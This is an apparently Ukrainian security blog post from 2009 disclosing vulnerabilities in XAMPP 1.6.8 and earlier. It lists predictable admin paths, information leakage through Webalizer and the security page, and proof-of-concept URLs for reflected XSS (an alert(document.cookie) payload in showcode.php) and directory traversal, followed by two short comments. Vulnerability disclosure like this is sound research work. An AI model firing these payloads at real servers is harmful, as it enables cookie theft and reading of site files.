Численні уразливості в XAMPP
20:29 16.07.200913.06.2009
У червні, 11.06.2009, я знайшов Predictable Resource Location, Information Leakage, Cross-Site Scripting та Directory Traversal уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.
Я вже писав про Cross-Site Scripting уразливість в XAMPP.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
16.07.2009
Predictable Resource Location:
В XAMPP є стандартні шляхи до ресурсів, які можуть бути використанні для атаки.
http://site/security/ - сервіс безпеки XAMPP
http://site/xampp/ - адмінка XAMPP
http://site/phpmyadmin/ - PhpMyAdmin
http://site/webalizer/ - Webalizer
Information Leakage:
http://site/webalizer/
Доступ до Webalizer не є обмеженим і враховуючи відомий шлях до ресурсу, будь-хто може отримати доступ до статистики сайта, що може призвести до значного витоку інформації, в тому числі про різні ресурси на сайті.
Information Leakage:
http://site/security/
Сервіс безпеки XAMPP (XAMPP SECURITY [Security Check 1.0]), якщо доступ до нього відкритий, призводить до витоку інформації.
Він виводить інформацію про версію PHP та про стан компонентів XAMPP, зокрема PhpMyAdmin.
XSS:
http://site/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/xampp/showcode.php?showcode=1&TEXT[global-sourcecode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Працює при register globals.
Directory Traversal:
http://site/xampp/showcode.php?showcode=1&file=../index.php
Працює при register globals.
Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).
Четвер, 21:16 16.07.2009
до речі, всюда є пхпінфо:
http://site/xampp/phpinfo.php
Субота, 01:24 18.07.2009
poma, так phpinfo.php є на сайтах з XAMPP. Але це актуально тільки на тих сайтах, де є доступ до адмінки (через відповідні уразливості).
Я знайшов чимало уразливостей в XAMPP, про які написав в різних advisory (всі знайдені уразливості я розбив на багато окремих описів). В тому числі й phpinfo.php я виявив, про нього я розповів в одному з описів уразливостей в XAMPP (Information Leakage).
Так що не переживай, в XAMPP я виявив чимало дірок . Про які вже зробив анонси і повідомив розробникам (які, в свою чергу, лише одного разу мені відповіли і не повідомили про жодні заплановані виправлення даних уразливостей). І про які я в цьому місяці оприлюдню деталі (даний запис - це перші заплановані оприлюднені деталі уразливостей в XAMPP).